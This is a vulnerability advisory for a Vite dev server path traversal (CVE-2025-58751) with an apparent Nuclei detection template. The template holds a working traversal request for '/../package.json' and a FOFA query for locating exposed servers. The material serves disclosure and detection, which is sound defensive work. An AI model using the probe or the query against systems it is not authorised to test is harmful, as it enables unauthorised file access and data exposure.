Vite is a frontend tooling framework for JavaScript. Prior to versions 7.1.5, 7.0.7, 6.3.6, and 5.4.20, files starting with the same name with the public directory were served bypassing the `server.fs` settings. Only apps that explicitly expose the Vite dev server to the network (using --host or `server.host` config option), use the public directory feature (enabled by default), and have a symlink in the public directory are affected. Versions 7.1.5, 7.0.7, 6.3.6, and 5.4.20 fix the issue.
PoC代码[已公开]
id: CVE-2025-58751
info:
name: Vite Dev Server - Path Traversal
author: wn147
severity: low
description: |
Vite is a frontend tooling framework for JavaScript. Prior to versions 7.1.5, 7.0.7, 6.3.6, and 5.4.20, files starting with the same name with the public directory were served bypassing the `server.fs` settings. Only apps that explicitly expose the Vite dev server to the network (using --host or `server.host` config option), use the public directory feature (enabled by default), and have a symlink in the public directory are affected. Versions 7.1.5, 7.0.7, 6.3.6, and 5.4.20 fix the issue.
impact: |
Attackers can access unauthorized files bypassing filesystem restrictions, potentially exposing sensitive data.
remediation: |
Update to versions 7.1.5, 7.0.7, 6.3.6, or 5.4.20 or later.
reference:
- https://github.com/vitejs/vite/security/advisories/GHSA-g4jq-h2w9-997c
- https://nvd.nist.gov/vuln/detail/CVE-2025-58751
classification:
cve-id: CVE-2025-58751
epss-score: 0.02086
epss-percentile: 0.83503
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-22
metadata:
verified: true
max-request: 1
fofa-query: body="/@vite/client"
tags: cve,cve2025,vite,lfi,vuln
http:
- method: GET
path:
- "{{BaseURL}}/../package.json"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains_all(body, "\"name\":", "\"overrides\":")'
condition: and
# digest: 4a0a0047304502205481c158ed91afd1e293465bc047a37c7e154c94ae48dc7ae50dbb6678bf7952022100c772a88aca9f872f7f8047dad1fd648be8ed00474c5429d46becb7720b049126:922c64590222798bb761d5b6d8e72950